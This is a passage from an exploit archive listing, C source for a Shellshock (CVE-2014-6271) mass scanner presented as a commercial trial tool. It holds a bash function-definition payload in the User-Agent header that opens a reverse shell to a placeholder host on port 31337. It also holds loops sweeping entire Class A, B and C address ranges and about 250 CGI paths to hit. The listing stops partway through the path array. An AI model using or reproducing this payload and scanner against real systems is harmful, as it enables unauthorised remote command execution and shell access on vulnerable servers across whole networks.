what you don't know can hurt you

Advanced Information Security Shellshock Scanner

Advanced Information Security Shellshock Scanner
Posted Oct 3, 2014
Authored by Nicholas Lemonias

AIS shellshock scanning tool that leverages the User-Agent header against a large list of possible targets. Written in C.

tags | exploit
MD5 | 74ab1fba2486673b18ce5c1a7900ba50

Advanced Information Security Shellshock Scanner

Change Mirror Download
 /*
** File : shellshock.c
** Author : Nicholas Lemonias
**
** This is proprietary source code material of Advanced Information Security Corporation.
** Usage, distribution and modifications are pursuant to our terms of agreement.
**
**
** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
** author of this software.
** All rights reserved.
**
**
** Web Vulnerability Assessment Software for Shellshock Vulnerability [CVE-2014-6271].
** FREE TRIAL - DEMO VERSION
**
*/

/****************************************************************************************
(c) 2014 Advanced Information Security Corporation
*****************************************************************************************

/* Exploit Compilation: cc shellshock.c -o shellshock
**
** HOW-TO
**
** ./shellshock -i (Single IP)
** ./shellshock -a xx (Class A)
** ./shellshock -b xxx.xx (Class B)
** ./shellshock -c xxx.xxx.xxx (Class C,D,E)
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
// #include <optarg.h>

#define PORT 80
#define TIMEOUT 3 // timing out?

char server[500];
char *result;

void usage(char *);
void try(char *);
static int i,x,y,z;

char A(char *);
char B(char *);
char C(char *);
char D(char *);
static char a[4],b[8],c[12],ip[17];

int main(int argc, char *argv[]) {
int ch, ascan, bscan, cscan, ipscan, temp = 0;
char IP[128], printip[128];

if (argc < 2) {
printf("**********************************************************************\n");
printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved\n");
printf("**********************************************************************\n");
printf("\n");
printf("|Class A|: 1-126 N.H.H.H\n");
printf("**********************************************************************\n");
printf("|Class B|: 128-191 N.N.H.H\n");
printf("**********************************************************************\n");
printf("|Class C|: 192-223 N.N.N.H\n");
printf("**********************************************************************\n");
printf("|Class D|: 224-239 N.N.N.H\n");
printf("**********************************************************************\n");
printf("|Class E|: 240-254 N.N.N.H\n");
printf("|Private IP|: 10.0.0.0 - 255.255.255.255\n");
printf("**********************************************************************\n");
printf("\n");
printf("\nUsage:\n%s -i <Single IP> OR -a <Class A> OR -b <class B> OR -c <Class C,D,E> Accepted Values: 1-255\n\n", argv[0]);
exit(0);
}
while ((ch = getopt(argc, argv, "i:a:b:c:")) != EOF) {
switch (ch) {
case 'i':
snprintf(IP, sizeof IP - 1, "%s", optarg);
IP[strcspn(IP, "\n")] = '\0';
ipscan = 1;
break;
case 'a':
snprintf(IP, sizeof IP - 1, "%s", optarg);
IP[strcspn(IP, "\n")] = '\0';
ascan = 1;
break;
case 'b':
snprintf(IP, sizeof IP - 1, "%s", optarg);
IP[strcspn(IP, "\n")] = '\0';
bscan = 1;
break;
case 'c':
snprintf(IP, sizeof IP - 1, "%s", optarg);
IP[strcspn(IP, "\n")] = '\0';
cscan = 1;
break;
}
}
if (ipscan == 1) {
printf("Scanning IP %s\n", IP);
try(IP);
exit(1);
}
if (ascan == 1) {
printf("Scanning class A %s.\n", IP);
A(IP);
}
if (bscan == 1) {
printf("Scanning class B %s.\n", IP);
B(IP);
}
if (cscan == 1) {
printf("Scanning class C %s.\n", IP);
C(IP);
}
exit(0);
}


/* A */
char A(char *Aclass) {
if(strlen(Aclass)>3) {
printf("wrong range");
exit(-1);
}
for(x=0;x<=255;++x) {
for(y=0;y<=255;++y) {
for(z=0;z<=255;++z) {
snprintf(ip,sizeof(ip),"%s.%d.%d.%d",Aclass,x,y,z);
printf("trying %s\t->\t",ip);
try(ip);
}
}
}
}/* end of A */


/* B */
char B(char *Bclass) {
for(y=0;y<=255;++y) {
for(z=0;z<=255;++z) {
snprintf(ip,sizeof(ip),"%s.%d.%d",Bclass,y,z);
printf("trying %s\t->\t",ip);
try(ip);
}
}
}

/* end of B */


/* C */
char C(char *Cclass) {
for(z=0;z<=255;++z) {
if( !strcmp(ip,".4") ) exit(EXIT_FAILURE);
snprintf(ip,sizeof(ip),"%s.%d",Cclass,z);
printf("trying %s\t->\t",ip);
try(ip);
}
} /* end of C */


/* try */

void try(char *IP) {

char *buff[371];
char *bug[371];

char buffers[800];
char *buffer;
char message[] = "HEAD / HTTP/1.1\n\r\n\r";
char *useragent = "() { :; }; /bin/bash -i >& /dev/tcp/your.domain.com/31337 0<&1 2>&1";

int i,sock;

struct timeval tv;
struct sockaddr_in remote;

fd_set wset;
fd_set rset;

buff[1] = "GET /_mt/mt.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[2] = "GET /admin.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[3] = "GET /administrator.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[4] = "GET /agora.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[5] = "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[6] = "GET /analyse.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[7] = "GET /apps/web/vs_diag.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[8] = "GET /axis-cgi/buffer/command.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[9] = "GET /bandwidth/index.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[10] = "GET /bigconf.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[11] = "GET /cart.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[12] = "GET /cartcart.cgi HTTP/1.0\nUser-Agent: %s\n\n";
buff[13] = "GET /ccbill/whereami.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[14] = "GET /cgi-bin/status HTTP/1.0\nUser-Agent:%s\n\n";
buff[15] = "GET /cgi-bin-sdb/printenv HTTP/1.0\nUser-Agent:%s\n\n";
buff[16] = "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[17] = "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[18] = "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[19] = "GET /cgi-bin/.namazu.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[20] = "GET /cgi-bin/14all-1.1.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[21] = "GET /cgi-bin/14all.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[22] = "GET /cgi-bin/a1disp3.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[23] = "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[24] = "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[25] = "GET /cgi-bin/add_ftp.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[26] = "GET /cgi-bin/addbanner.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[27] = "GET /cgi-bin/adduser.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[28] = "GET /cgi-bin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[29] = "GET /cgi-bin/admin.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[30] = "GET /cgi-bin/admin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[31] = "GET /cgi-bin/admin/setup.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[32] = "GET /cgi-bin/adminhot.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[33] = "GET /cgi-bin/adminwww.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[34] = "GET /cgi-bin/af.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[35] = "GET /cgi-bin/aglimpse.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[36] = "GET /cgi-bin/alienform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[37] = "GET /cgi-bin/AnyBoard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[38] = "GET /cgi-bin/architext_query.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[39] = "GET /cgi-bin/astrocam.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[40] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[41] = "GET /cgi-bin/AT-generate.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[42] = "GET /cgi-bin/auction/auction.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[43] = "GET /cgi-bin/auktion.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[44] = "GET /cgi-bin/ax-admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[45] = "GET /cgi-bin/ax.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[46] = "GET /cgi-bin/axs.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[47] = "GET /cgi-bin/badmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[48] = "GET /cgi-bin/banner.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[49] = "GET /cgi-bin/bannereditor.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[50] = "GET /cgi-bin/bb-ack.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[51] = "GET /cgi-bin/bb-hist.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[52] = "GET /cgi-bin/bb-histlog.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[53] = "GET /cgi-bin/bb-hostsvc.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[54] = "GET /cgi-bin/bb-rep.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[55] = "GET /cgi-bin/bb-replog.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[56] = "GET /cgi-bin/bbs_forum.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[57] = "GET /cgi-bin/bigconf.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[58] = "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[59] = "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[60] = "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[61] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[62] = "GET /cgi-bin/book.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[63] = "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[64] = "GET /cgi-bin/bsguest.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[65] = "GET /cgi-bin/bslist.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[66] = "GET /cgi-bin/build.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[67] = "GET cgi-bin/bulk/bulk.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[68] = "GET /cgi-bin/c_download.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[69] = "GET /cgi-bin/cached_feed.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[70] = "GET /cgi-bin/cachemgr.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[71] = "GET /cgi-bin/calendar/index.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[72] = "GET /cgi-bin/cartmanager.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[73] = "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[74] = "GET /cgi-bin/ccvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[75] = "GET /cgi-bin/cgforum.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[76] = "GET /cgi-bin/cgi_process HTTP/1.0\nUser-Agent:%s\n\n";
buff[77] = "GET /cgi-bin/classified.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[78] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[79] = "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[80] = "GET /cgi-bin/classifieds/index.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[81] = "GET /cgi-bin/commandit.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[82] = "GET /cgi-bin/commerce.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[83] = "GET /cgi-bin/common/listrec.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[84] = "GET /cgi-bin/compatible.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[85] = "GET /cgi-bin/Count.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[86] = "GET /cgi-bin/csChatRBox.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[87] = "GET /cgi-bin/csGuestBook.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[88] = "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[89] = "GET /cgi-bin/CSMailto.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[90] = "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[91] = "GET /cgi-bin/csNews.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[92] = "GET /cgi-bin/csNewsPro.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[93] = "GET /cgi-bin/csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[94] = "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[95] = "GET /cgi-bin/csSearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[96] = "GET /cgi-bin/csv_db.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[97] = "GET /cgi-bin/cvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[98] = "GET /cgi-bin/cvslog.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[99] = "GET /cgi-bin/cvsquery.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[100] = "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[101] = "GET /cgi-bin/day5datacopier.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[102] = "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[103] = "GET /cgi-bin/db_manager.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[104] = "GET /cgi-bin/dbman/db.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[105] = "GET /cgi-bin/dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[106] = "GET /cgi-bin/dfire.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[107] = "GET /cgi-bin/diagnose.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[108] = "GET /cgi-bin/dig.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[109] = "GET /cgi-bin/directorypro.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[110] = "GET /cgi-bin/download.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[111] = "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[112] = "GET /cgi-bin/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[113] = "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[114] = "GET /cgi-bin/enter.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[115] = "GET /cgi-bin/environ.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[116] = "GET /cgi-bin/ezadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[117] = "GET /cgi-bin/ezboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[118] = "GET /cgi-bin/ezman.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[119] = "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[120] = "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[121] = "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[122] = "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[123] = "GET /cgi-bin/faqmanager.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[124] = "GET /cgi-bin/FileSeek.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[125] = "GET /cgi-bin/FileSeek2.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[126] = "GET /cgi-bin/finger.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[127] = "GET /cgi-bin/flexform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[128] = "GET /cgi-bin/fom.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[129] = "GET /cgi-bin/fom/fom.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[130] = "GET /cgi-bin/FormHandler.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[131] = "GET /cgi-bin/FormMail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[132] = "GET /cgi-bin/gbadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[133] = "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[134] = "GET /cgi-bin/generate.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[135] = "GET /cgi-bin/getdoc.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[136] = "GET /cgi-bin/gH.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[137] = "GET /cgi-bin/gm-authors.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[138] = "GET /cgi-bin/gm-cplog.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[139] = "GET /cgi-bin/gm.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[140] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[141] = "GET /cgi-bin/handler HTTP/1.0\nUser-Agent:%s\n\n";
buff[142] = "GET /cgi-bin/handler.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[143] = "GET /cgi-bin/handler/netsonar HTTP/1.0\nUser-Agent:%s\n\n";
buff[144] = "GET /cgi-bin/hitview.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[145] = "GET /cgi-bin/hsx.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[146] = "GET /cgi-bin/html2chtml.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[147] = "GET /cgi-bin/html2wml.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[148] = "GET /cgi-bin/htsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[149] = "GET /cgi-bin/icat HTTP/1.0\nUser-Agent:%s\n\n";
buff[150] = "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[151] = "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[152] = "GET /cgi-bin/imageFolio.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[153] = "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[154] = "GET /cgi-bin/infosrch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[155] = "GET /cgi-bin/jammail.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[156] = "GET /cgi-bin/journal.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[157] = "GET /cgi-bin/lastlines.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[158] = "GET /cgi-bin/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[159] = "GET /cgi-bin/log-reader.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[160] = "GET /cgi-bin/login.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[161] = "GET /cgi-bin/logit.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[162] = "GET /cgi-bin/lookwho.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[163] = "GET /cgi-bin/lwgate.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[164] = "GET /cgi-bin/MachineInfo HTTP/1.0\nUser-Agent:%s\n\n";
buff[165] = "GET /cgi-bin/magiccard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[166] = "GET /cgi-bin/mail/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[167] = "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[168] = "GET /cgi-bin/maillist.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[169] = "GET /cgi-bin/mailnews.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[170] = "GET /cgi-bin/main.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[171] = "GET /cgi-bin/main_menu.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[172] = "GET /cgi-bin/man.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[173] = "GET /cgi-bin/mini_logger.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[174] = "GET /cgi-bin/mmstdod.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[175] = "GET /cgi-bin/moin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[176] = "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[177] = "GET /cgi-bin/mrtg.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[178] = "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[179] = "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[180] = "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[181] = "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[182] = "GET /cgi-bin/musicqueue.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[183] = "GET /cgi-bin/myguestbook.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[184] = "GET /cgi-bin/netauth.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[185] = "GET /cgi-bin/netpad.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[186] = "GET /cgi-bin/newsdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[187] = "GET /cgi-bin/nlog-smb.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[188] = "GET /cgi-bin/nph-emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[189] = "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[190] = "GET /cgi-bin/nph-publish.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[191] = "GET /cgi-bin/nph-test.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[192] = "GET /cgi-bin/pagelog.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[193] = "GET /cgi-bin/pbcgi.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[194] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[195] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[196] = "GET /cgi-bin/pfdisplay.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[197] = "GET /cgi-bin/phf.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[198] = "GET /cgi-bin/photo/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[199] = "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[200] = "GET /cgi-bin/php.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[201] = "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[202] = "GET /cgi-bin/pollssi.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[203] = "GET /cgi-bin/postcards.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[204] = "GET /cgi-bin/powerup/r.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[205] = "GET /cgi-bin/printenv HTTP/1.0\nUser-Agent:%s\n\n";
buff[206] = "GET /cgi-bin/probecontrol.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[207] = "GET /cgi-bin/profile.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[208] = "GET /cgi-bin/publisher/search.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[209] = "GET /cgi-bin/quickstore.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[210] = "GET /cgi-bin/quizme.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[211] = "GET /cgi-bin/r.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[212] = "GET /cgi-bin/ratlog.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[213] = "GET /cgi-bin/register.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[214] = "GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0\nUser-Agent:%s\n\n";
buff[215] = "GET /cgi-bin/responder.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[216] = "GET /cgi-bin/robadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[217] = "GET /cgi-bin/robpoll.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[218] = "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[219] = "GET /cgi-bin/scoadminreg.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[220] = "GET /cgi-bin/search HTTP/1.0\nUser-Agent:%s\n\n";
buff[221] = "GET /cgi-bin/search.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[222] = "GET /cgi-bin/search/search.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[223] = "GET /cgi-bin/sendform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[224] = "GET /cgi-bin/shop.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[225] = "GET /cgi-bin/shopper.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[226] = "GET /cgi-bin/shopplus.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[227] = "GET /cgi-bin/showcheckins.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[228] = "GET /cgi-bin/simplestguest.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[229] = "GET /cgi-bin/simplestmail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[230] = "GET /cgi-bin/smartsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[231] = "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[232] = "GET /cgi-bin/snorkerz.bat HTTP/1.0\nUser-Agent:%s\n\n";
buff[233] = "GET /cgi-bin/snorkerz.cmd HTTP/1.0\nUser-Agent:%s\n\n";
buff[234] = "GET /cgi-bin/sojourn.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[235] = "GET /cgi-bin/spin_client.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[236] = "GET /cgi-bin/start.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[237] = "GET /cgi-bin/store.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[238] = "GET /cgi-bin/store/agora.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[239] = "GET /cgi-bin/store/index.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[240] = "GET /cgi-bin/survey.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[241] = "GET /cgi-bin/talkback.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[242] = "GET /cgi-bin/technote/main.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[243] = "GET /cgi-bin/test-cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[244] = "GET /cgi-bin/test.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[245] = "GET /cgi-bin/test/test.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[246] = "GET /cgi-bin/test2.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[247] = "GET /cgi-bin/testing_whatever HTTP/1.0\nUser-Agent:%s\n\n";
buff[248] = "GET /cgi-bin/tidfinder.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[249] = "GET /cgi-bin/tigvote.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[250] = "GET /cgi-bin/title.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[251] = "GET /cgi-bin/traffic.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[252] = "GET /cgi-bin/troops.cgi HTTP/1.0\nUser-Agent:%s\n\n";
